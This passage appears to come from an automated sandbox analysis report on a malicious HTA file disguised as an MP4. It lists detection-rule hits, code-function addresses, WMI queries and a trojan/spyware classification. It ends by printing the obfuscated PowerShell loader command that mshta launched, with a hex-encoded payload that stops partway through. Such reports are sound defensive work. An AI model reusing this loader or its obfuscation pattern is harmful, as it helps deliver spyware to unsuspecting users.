                Source: Process Memory Space: powershell.exe PID: 1056, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3184, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D9FEB0 NtResumeThread,4_2_06D9FEB0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D9FEA8 NtResumeThread,4_2_06D9FEA8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E9CB782_2_00E9CB78
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E9D4482_2_00E9D448
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E9C8302_2_00E9C830
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00867D104_2_00867D10
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_008646204_2_00864620
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_008646304_2_00864630
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0086B3C84_2_0086B3C8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00DAB5804_2_00DAB580
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00E1A2034_2_00E1A203
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00E176214_2_00E17621
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00E176284_2_00E17628
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00E1E7104_2_00E1E710
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00E138E84_2_00E138E8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00E138F84_2_00E138F8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00E188904_2_00E18890
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00E13E904_2_00E13E90
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D497A84_2_06D497A8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D473B04_2_06D473B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D497994_2_06D49799
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D475744_2_06D47574
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D462C04_2_06D462C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D462B14_2_06D462B1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D473A04_2_06D473A0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D418B04_2_06D418B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D4B8B84_2_06D4B8B8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D4B8A84_2_06D4B8A8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D674C94_2_06D674C9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D675104_2_06D67510
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D947984_2_06D94798
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D947884_2_06D94788
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D9A7584_2_06D9A758
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D9A7484_2_06D9A748
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D9CF784_2_06D9CF78
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D9DC384_2_06D9DC38
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D9DC2B4_2_06D9DC2B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB67B84_2_06DB67B8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB73284_2_06DB7328
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB76394_2_06DB7639
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB6A304_2_06DB6A30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB67A84_2_06DB67A8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB6B554_2_06DB6B55
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB00404_2_06DB0040
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB68754_2_06DB6875
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB60104_2_06DB6010
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB78004_2_06DB7800
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB00074_2_06DB0007
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB683A4_2_06DB683A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB60204_2_06DB6020
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB6D214_2_06DB6D21
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_073987604_2_07398760
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004388508_2_00438850
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004538608_2_00453860
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004518A08_2_004518A0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0045DA538_2_0045DA53
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00467DF08_2_00467DF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004395808_2_00439580
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004566D08_2_004566D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004457998_2_00445799
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004688108_2_00468810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044682D8_2_0044682D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004588CB8_2_004588CB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046D8808_2_0046D880
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004609408_2_00460940
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004339708_2_00433970
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004509398_2_00450939
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004479C18_2_004479C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004541C08_2_004541C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004531C28_2_004531C2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046B1D08_2_0046B1D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004591DD8_2_004591DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046D9808_2_0046D980
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046D9978_2_0046D997
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004359908_2_00435990
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004521908_2_00452190
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046D9998_2_0046D999
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004391B08_2_004391B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0045CA498_2_0045CA49
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004462638_2_00446263
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043EA108_2_0043EA10
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004452208_2_00445220
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0045CAD08_2_0045CAD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004552DD8_2_004552DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044B2E08_2_0044B2E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004362808_2_00436280
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046DA808_2_0046DA80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044E2908_2_0044E290
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044CB408_2_0044CB40
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046D34D8_2_0046D34D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00456B508_2_00456B50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046DB608_2_0046DB60
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0045830D8_2_0045830D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00466B088_2_00466B08
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0045CB118_2_0045CB11
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004553278_2_00455327
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004343208_2_00434320
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0045CB228_2_0045CB22
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004383308_2_00438330
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046F3308_2_0046F330
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0045A33F8_2_0045A33F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043DBD98_2_0043DBD9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004543808_2_00454380
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044FC758_2_0044FC75
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044DC008_2_0044DC00
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00459C2B8_2_00459C2B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004591DD8_2_004591DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043ACF08_2_0043ACF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004374F08_2_004374F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044148F8_2_0044148F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0045AC908_2_0045AC90
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046ECA08_2_0046ECA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043CD468_2_0043CD46
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004675008_2_00467500
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004525108_2_00452510
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00447DEE8_2_00447DEE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044759F8_2_0044759F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00466E748_2_00466E74
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00455E708_2_00455E70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004576038_2_00457603
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00455E308_2_00455E30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004586C08_2_004586C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046AEC08_2_0046AEC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00435EE08_2_00435EE0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004536E28_2_004536E2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044DE808_2_0044DE80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00432F508_2_00432F50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00450F508_2_00450F50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00468F598_2_00468F59
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004367108_2_00436710
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00453F208_2_00453F20
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046F7208_2_0046F720
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00449F308_2_00449F30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044E7C08_2_0044E7C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004497C28_2_004497C2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0045DFE98_2_0045DFE9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043A7808_2_0043A780
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00441F908_2_00441F90
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004487928_2_00448792
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046EFB08_2_0046EFB0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00444400 appears 65 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00438030 appears 42 times
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 3792
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 3792Jump to behavior
                Source: Process Memory Space: powershell.exe PID: 1056, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3184, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@9/6@2/2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00467DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,8_2_00467DF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Ruiexf
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vusaxqh3.fch.ps1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: singl6.mp4.htaVirustotal: Detection: 9%
                Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\singl6.mp4.hta"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34
